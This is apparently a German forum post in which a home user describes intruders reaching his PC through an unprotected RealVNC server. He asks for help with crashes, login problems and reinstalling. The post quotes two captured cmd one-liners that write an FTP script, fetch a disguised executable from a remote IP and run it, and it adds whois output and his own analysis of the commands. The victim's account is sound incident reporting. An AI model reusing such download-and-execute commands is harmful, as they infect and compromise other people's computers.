während VNC-Session führt Win-Ausführen-Dialog autom. Commandos aus

taz

Ich habe seit kurzem 2 weitere Probleme. Der Datei-Explorer schmiert (auch im Leerlauf) ständig ab (Keine Rückmeldung), so dass ich ihn immer mit dem Task Manager zwingen muß, sich zu schließen. Jeder weiss, was dann immer passiert. Der Desktop ist kurz weg und die explorer.exe startet neu.
Das andere ist, dass meine Freundin mir heute erzählte, dass sie sich letzte Woche mehrfach nicht in ihren GMX-, Ebay- und ….-Account einloggen konnte, obwohl sie das richtige PW verwendete. Erst wenn sie das PW in einen Editor eingegeben und in die Zwischenablage geholt hatte, um dann mit STRG-V das PW einzugeben, konnte sie sich einloggen !!!???

Ich habe mir heute mal ein wenig Zeit genommen und ein paar Dinge gecheckt.

- VNC-Log (siehe weiter unten):
konnte ich nicht finden 

- FW-Log: In den Einstellungen fand ich, dass Log-files nur maximal …. kb groß sein dürfen. Dies reicht jedoch gerade für 2 Tage. Der Vorfall während der Nachhilfe war jedoch bereits am 04/11/07. 

- Suche nach den Dateien, die herunterzuladen versucht wurden.
Ich durchsuchte all meine Platten mit der Datei-Explorer-Suche und mit der TuneUp Undelete Suche. Die Letztere begibt sich auf die Suche nach bereits gelöschten Dateien.
- mit Registry Finder von jv16 PowerTools die kpl Reg durchsucht
- jede Suche wurde sowohl nach kpl Dateinamen (ohne Erweiterung) als auch nach gewissen Fragmenten ihrer Namen (unter Verwendung von Wildcards, versteht sich) durchgeführt
- kein Ergebnis 

Erklärt mich jetzt nicht für verrückt, aber ich habe dem Script 2mal erneut Zugriff erteilt, indem ich den VNC-Server wieder habe laufen lassen, um so ein FW-Log zu erzeugen. Zunächst hatte ich die Einstellung prompt local user to accept connection aktiv, mit der nichts passierte. Erst nachdem ich diese Einstellung deaktivierte und ein paar Minuten wartete, kam wieder jemand auf meinen Rechner. Dann schrieb sich wieder Folgendes in mein Ausführen-Dialog:

cmd /c echo OPEN 78.54.224.154 23330>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

bzw. Beim zweiten Mal

cmd /c echo open 78.54.38.155 1445 >> i &echo user gnttac gnttac >> i &echo get msoft56684.exe >> i &echo quit >> i &ftp -nv -s:i &msoft56684.exe &exit

Dann ging die ftp-shell auf:

OPEN 78.54.224.154 (bzw. 78.54.38.155)

Währenddessen versuchte ich verzweifelt die Client-IP herauszubekommen. Aber genau wie die Log-Funktion scheint auch diese Funktionalität den Käufern von RealVNC vorbehalten zu sein. Ich habe jedoch nur die Free Edition.

Meine Firewall jedoch hatte nun ein Log, den ich in der nächsten Antwort angehangen habe. Die Excel-Datei konnte ich nicht hochladen, deshalb sieht die Word-Version ein wenig blöd aus. Habe die Liste etwas aufbereitet, einerseits zur Anonymisierung und andererseits damit man dort besser durchsieht. Wenn sich diese Datei mal jemand anschauen würde, wäre ich sehr dankbar. Bei Bedarf kann ich auch die Excel Datei zusenden.

Auch führte ich beim 2. Mal ein backtrace (whois) durch, um evtl auf diesem Wege noch mehr zu erfahren. Diese beiden IPs finden sich auch in meinem FW-Log.

*************************************************
Detailinformation von [78.54.38.155]:
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See Whois Database Copyright

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag

% Information related to '78.53.192.0 - 78.54.159.255'

inetnum: 78.53.192.0 - 78.54.159.255
netname: HANSENET-ADSL
descr: HanseNet Telekommunikation GmbH
descr: ALICE DSL
country: DE
admin-c: HNT-RIPE
tech-c: HANO-RIPE
status: ASSIGNED PA
mnt-by: HANSENET-MNT
mnt-lower: HANSENET-NOC
mnt-routes: HANSENET-MNT
source: RIPE # Filtered

role: HanseNet IP Coordination
address: HanseNet Telekommunikation GmbH
address: Ueberseering 33 A
address: D-22297 Hamburg
address: Germany
phone: +49 40 23726 0
fax-no: +49 40 23726 193996
abuse-mailbox: abuse@hansenet.com
admin-c: DM3738-RIPE
tech-c: HANO-RIPE
nic-hdl: HNT-RIPE
mnt-by: HANSENET-MNT
source: RIPE # Filtered

role: HanseNet Network Operators
address: HanseNet Telekommunikation GmbH
address: Ueberseering 33a
address: D-22297 Hamburg
abuse-mailbox: abuse@hansenet.com
admin-c: DM3738-RIPE
tech-c: TG819-RIPE # Thomas Graumann
tech-c: EULE-RIPE # Marco Eulenfeld
tech-c: SA1375-RIPE # Svend Andersen
tech-c: ASZ-RIPE # Andreas Schwarz
tech-c: OLBA-RIPE # Olaf Baumert
nic-hdl: HANO-RIPE
mnt-by: HANSENET-NOC
source: RIPE # Filtered

% Information related to '78.48.0.0/13AS13184'

route: 78.48.0.0/13
descr: HANSENET
origin: AS13184
mnt-by: HANSENET-MNT
source: RIPE # Filtered

*************************************************

Detailinformation von [85.179.104.152]:
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See Whois Database Copyright

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '85.176.0.0 - 85.182.127.255'

inetnum: 85.176.0.0 - 85.182.127.255
netname: HANSENET-ADSL
descr: ALICE DSL
descr: HanseNet Telekommunikation GmbH
descr: ADSL Pool Customers
country: DE
admin-c: HNT-RIPE
tech-c: HANO-RIPE
status: ASSIGNED PA
mnt-by: HANSENET-MNT
mnt-lower: HANSENET-NOC
mnt-routes: HANSENET-MNT
source: RIPE # Filtered

role: HanseNet IP Coordination
address: HanseNet Telekommunikation GmbH
address: Ueberseering 33 A
address: D-22297 Hamburg
address: Germany
phone: +49 40 23726 0
fax-no: +49 40 23726 193996
abuse-mailbox: abuse@hansenet.com
admin-c: DM3738-RIPE
tech-c: HANO-RIPE
nic-hdl: HNT-RIPE
mnt-by: HANSENET-MNT
source: RIPE # Filtered

role: HanseNet Network Operators
address: HanseNet Telekommunikation GmbH
address: Ueberseering 33a
address: D-22297 Hamburg
abuse-mailbox: abuse@hansenet.com
admin-c: DM3738-RIPE
tech-c: TG819-RIPE # Thomas Graumann
tech-c: EULE-RIPE # Marco Eulenfeld
tech-c: SA1375-RIPE # Svend Andersen
tech-c: ASZ-RIPE # Andreas Schwarz
tech-c: OLBA-RIPE # Olaf Baumert
nic-hdl: HANO-RIPE
mnt-by: HANSENET-NOC
source: RIPE # Filtered

% Information related to '85.176.0.0/13AS13184'

route: 85.176.0.0/13
descr: HANSENET
origin: AS13184
mnt-by: HANSENET-MNT
source: RIPE # Filtered

*************************************************

Des weiteren nahm ich mal das Kommando auseinander, um dort vllt ein paar Rückschlüsse zu finden.

cmd /c echo OPEN 78.54.224.154 23330>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

Zum x konnte ich nichts finden. Ich nehme an (wegen del x), dass es eine Variable ist, die den Dateinamen aufnimmt bzw zurückgibt.
-n unterdrückt die Möglichkeit der automatischen Anmeldung beim ersten Verbindungsaufbau.
-s: Dateiname
Gibt eine Textdatei an, die ftp-Befehle enthält. Diese Befehle werden nach dem Start von ftp automatisch ausgeführt. Dieser Parameter lässt keine Leerzeichen zu. Verwenden Sie diesen Parameter statt der Umleitung (<).

/c führt den durch Zeichenfolge angegebenen Befehl aus und beendet dann die Ausführung.

Echo
Schaltet die Befehlsanzeigenfunktionen ein bzw. aus oder zeigt eine Meldung an. Ohne Angabe von Parametern zeigt echo die aktuelle Echoeinstellung an.
Syntax
echo [{on | off}] [Nachricht]
Parameter
{ on| off}
Gibt an, ob die Befehlsanzeigenfunktion ein- (on) oder ausgeschaltet (off) wird.
Nachricht
Gibt den Text an, der auf dem Bildschirm angezeigt werden soll.
/?
Zeigt Hilfe an der Eingabeaufforderung an.
Hinweise
• Die Verwendung von echo Nachricht ist hilfreich, wenn echo deaktiviert ist. Falls Sie eine mehrzeilige Meldung anzeigen möchten, ohne dass andere Befehle angezeigt werden, können Sie in der Batchdatei nach dem Befehl echo off mehrere Instanzen des Befehls echo Nachricht verwenden.
• Wenn Sie echo off verwenden, wird die Eingabeaufforderung nicht auf dem Bildschirm angezeigt. Geben Sie den Befehl echo on ein, um die Eingabeaufforderung anzuzeigen.
• Sie können die Wiedergabe einer Zeile verhindern, indem Sie in einer Batchdatei vor dem Befehl ein At-Zeichen (@) eingeben.
• Um eine leere Zeile auf dem Bildschirm wiederzugeben, müssen Sie Folgendes eingeben:
echo.
• Verwenden Sie ein Caretzeichen (^), um Umleitungs- (< und >) oder Verkettungszeichen (|) zusammen mit echo zu verwenden. Geben Sie das Caretzeichen unmittelbar vor dem jeweiligen Zeichen ein (z. B. ^>, ^ oder ^| ). Geben Sie zwei aufeinander folgende Caretzeichen (^^) ein, wenn Sie das Caretzeichen selbst verwenden möchten.


Ftp: open
Stellt eine Verbindung zum angegebenen FTP-Server her.
Ftp: get
Kopiert eine Remotedatei auf den lokalen Computer. Dabei wird der aktuelle Dateiübertragungsmodus verwendet.
Beim Befehl sort habe ich gefunden:
Die Verwendung des Kleiner-als-Zeichens (<) oder Größer-als-Zeichens (>) zum Angeben der Eingabe- bzw. Ausgabedatei ist u. U. wenig effizient.

Ich habe mal danach geschaut. Die aktuellste Version von UltraVNC ist 1.0.2 und vom 01.07.2006. Gibt es da evtl noch aktuellere Tools ?

Ich konnte weder im RealVNC Installationsordner noch in den Einstellungen irgendwas von Log-Files finden. Gibt es evtl einen anderen Ort, wo ein solcher Dienst sein Log ablegt ?

Also ich bin mir ziemlich sicher, dass die FW weder deaktiviert wurde, noch, dass jemand fremdes selbst auf Traffic zulassen geklickt hat.

Die obige Recherche lässt mich vorbehaltlich Eurer Meinung zu meinem FW-Log darauf schließen, dass keinerlei Dateien runtergeladen oder gar ausgeführt wurden. Dennoch bin ich gerade wegen der 2 neuen Probleme (siehe ganz oben) etwas verunsichert.

Gut, dies werde ich bei nächster Gelegenheit tun, aber ein Frage habe ich dazu.

Ich habe mehrere Partitionen und auf C: nur mein System. Dinge wie ‚Eigene Dateien’ oder TBird Emails habe ich von Anfang an auf eine der anderen Partitionen ausgelagert. Auch Spiele sind auf anderen Partitionen installiert und mussten trotz neu aufgesetzter Systeme nicht neu installiert werden.
Wenn ich nun ein neues System aufsetze, wer garantiert mir, dass keinerlei befallene Dateien auf den anderen Partitionen schadhaften Code danach erneut platzieren ?

Vielen vielen Dank für Eure Geduld mit mir. Solangsam ist mir das nämlich ein wenig peinlich, gerade weil ich wahrscheinlich längst hätte ein neues System aufsetzen können 